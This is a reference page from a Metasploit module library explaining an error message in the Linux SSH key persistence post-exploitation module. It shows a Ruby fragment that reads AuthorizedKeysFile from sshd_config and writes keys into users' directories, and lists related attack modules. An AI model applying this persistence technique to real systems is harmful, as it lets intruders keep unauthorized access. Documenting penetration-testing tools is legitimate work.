    /^AuthorizedKeysFile[\s]+(?<auth_key_file>[\w%\/\.]+)/ =~ sshd_config
    if auth_key_file
No users found with a <AUTH_KEY_FOLDER> directory
Here is a relevant code snippet related to the "No users found with a <AUTH_KEY_FOLDER> directory" error message:
      end
    end

    paths = paths.select { |d| directory?(d) }
    if paths.nil? || paths.empty?
      print_error("No users found with a #{auth_key_folder} directory")
      return
    end
    write_key(paths, auth_key_file, sep)
  end
Related Pull Requests
- #14202 Merged Pull Request: Implement the zeitwerk autoloader within lib/msf/core
- #12354 Merged Pull Request: Remove targets from aux and post modules
- #6995 Merged Pull Request: sshkey persistence
See Also
Check also the following modules related to this module:
- post/linux/manage/dns_spoofing
- post/linux/manage/download_exec
- post/linux/manage/geutebruck_post_exp
- post/linux/manage/iptables_removal
- post/linux/manage/pseudo_shell
Authors
- h00die <[email protected]>
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.